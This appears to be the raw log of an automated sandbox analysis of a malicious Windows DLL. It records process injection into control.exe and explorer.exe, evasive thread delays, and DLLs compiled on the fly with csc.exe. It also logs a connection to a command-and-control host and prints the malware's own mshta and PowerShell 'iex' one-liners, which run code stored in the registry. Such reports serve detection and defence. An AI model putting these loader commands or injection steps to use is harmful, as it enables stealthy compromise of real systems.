Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\control.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3619
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5092
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5210
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3508

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\jqkof1ka\jqkof1ka.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\fedhsvoj\fedhsvoj.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\senxb4p4\senxb4p4.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\vbpfsg54\vbpfsg54.dll	Jump to dropped file

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5960	Thread sleep time: -4611686018427385s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5960	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2272	Thread sleep time: -10145709240540247s >= -30000s

Source: C:\Windows\System32\loaddll32.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\rundll32.exe	Last function: Thread delayed

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_03139386 lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_0312CA40 FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary,
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_03140F53 lstrlenW,lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_05380F53 lstrlenW,lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_05379386 lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_0536CA40 FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary,

Source: C:\Windows\System32\loaddll32.exe

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\System32\loaddll32.exe

Process information queried: ProcessInformation

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_6DD81D62 LoadLibraryA,GetProcAddress,

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_03133E8D ConvertStringSecurityDescriptorToSecurityDescriptorA,StrRChrA,_strupr,lstrlen,CreateEventA,RtlAddVectoredExceptionHandler,GetLastError,RtlRemoveVectoredExceptionHandler,
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_05373E8D ConvertStringSecurityDescriptorToSecurityDescriptorA,StrRChrA,_strupr,lstrlen,CreateEventA,RtlAddVectoredExceptionHandler,GetLastError,RtlRemoveVectoredExceptionHandler,

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)

Show sources

Source: C:\Windows\SysWOW64\rundll32.exe	Domain query: gtr.antoinfer.com
Source: C:\Windows\SysWOW64\rundll32.exe	Network Connect: 185.228.233.17 80

Allocates memory in foreign processes

Show sources

Source: C:\Windows\System32\loaddll32.exe

Memory allocated: C:\Windows\System32\control.exe base: 2F0000 protect: page execute and read and write

Compiles code for process injection (via .Net compiler)

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File written: C:\Users\user\AppData\Local\Temp\vbpfsg54\vbpfsg54.0.cs

Jump to dropped file

Creates a thread in another existing process (thread injection)

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread created: C:\Windows\explorer.exe EIP: 9B851580
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread created: C:\Windows\explorer.exe EIP: 9B851580
Source: C:\Windows\System32\control.exe	Thread created: C:\Windows\explorer.exe EIP: 9B851580

Maps a DLL or memory area into another process

Show sources

Source: C:\Windows\System32\loaddll32.exe

Section loaded: unknown target: C:\Windows\System32\control.exe protection: execute and read and write

Modifies the context of a thread in another process (thread injection)

Show sources

Source: C:\Windows\System32\loaddll32.exe

Thread register set: target process: 2224

Writes to foreign memory regions

Show sources

Source: C:\Windows\System32\loaddll32.exe	Memory written: C:\Windows\System32\control.exe base: 7FF6F6E412E0
Source: C:\Windows\System32\loaddll32.exe	Memory written: C:\Windows\System32\control.exe base: 2F0000
Source: C:\Windows\System32\loaddll32.exe	Memory written: C:\Windows\System32\control.exe base: 7FF6F6E412E0
Source: C:\Windows\SysWOW64\rundll32.exe	Memory written: C:\Windows\System32\control.exe base: 7FF6F6E412E0
Source: C:\Windows\SysWOW64\rundll32.exe	Memory written: C:\Windows\System32\control.exe base: 7FF6F6E412E0

Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\worVoBJYGD.dll',#1
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\senxb4p4\senxb4p4.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\fedhsvoj\fedhsvoj.cmdline'
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESE546.tmp' 'c:\Users\user\AppData\Local\Temp\senxb4p4\CSCD728609DA3104BA4891CE07457BF77DE.TMP'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\jqkof1ka\jqkof1ka.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\vbpfsg54\vbpfsg54.cmdline'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES419.tmp' 'c:\Users\user\AppData\Local\Temp\fedhsvoj\CSC2C7CB35724FE4D03B8B83A389D1E5FE.TMP'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESCE3.tmp' 'c:\Users\user\AppData\Local\Temp\jqkof1ka\CSCA3035077FC7544A28C7D2FD8A94650.TMP'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES278F.tmp' 'c:\Users\user\AppData\Local\Temp\vbpfsg54\CSCC3210ABFD4B4742A7EBA7934EB0D0.TMP'
Source: C:\Windows\System32\control.exe	Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h

Source: unknown	Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Nl6y='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Nl6y).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>'
Source: unknown	Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Pksv='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Pksv).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>'

Source: loaddll32.exe, 00000000.00000002.497036949.0000000001A10000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.500093549.0000000002F00000.00000002.00000001.sdmp, powershell.exe, 00000019.00000002.551579567.00000113254A0000.00000002.00000001.sdmp, control.exe, 0000001E.00000000.445185116.000001B22F940000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: loaddll32.exe, 00000000.00000002.497036949.0000000001A10000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.500093549.0000000002F00000.00000002.00000001.sdmp, powershell.exe, 00000019.00000002.551579567.00000113254A0000.00000002.00000001.sdmp, control.exe, 0000001E.00000000.445185116.000001B22F940000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: loaddll32.exe, 00000000.00000002.497036949.0000000001A10000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.500093549.0000000002F00000.00000002.00000001.sdmp, powershell.exe, 00000019.00000002.551579567.00000113254A0000.00000002.00000001.sdmp, control.exe, 0000001E.00000000.445185116.000001B22F940000.00000002.00000001.sdmp	Binary or memory string: SProgram Managerl
Source: loaddll32.exe, 00000000.00000002.497036949.0000000001A10000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.500093549.0000000002F00000.00000002.00000001.sdmp, powershell.exe, 00000019.00000002.551579567.00000113254A0000.00000002.00000001.sdmp, control.exe, 0000001E.00000000.445185116.000001B22F940000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd,
Source: loaddll32.exe, 00000000.00000002.497036949.0000000001A10000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.500093549.0000000002F00000.00000002.00000001.sdmp, powershell.exe, 00000019.00000002.551579567.00000113254A0000.00000002.00000001.sdmp, control.exe, 0000001E.00000000.445185116.000001B22F940000.00000002.00000001.sdmp	Binary or memory string: Progmanlock

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_0313FF06 cpuid

Source: C:\Windows\System32\loaddll32.exe

Code function: GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA,

Source: C:\Windows\System32\loaddll32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
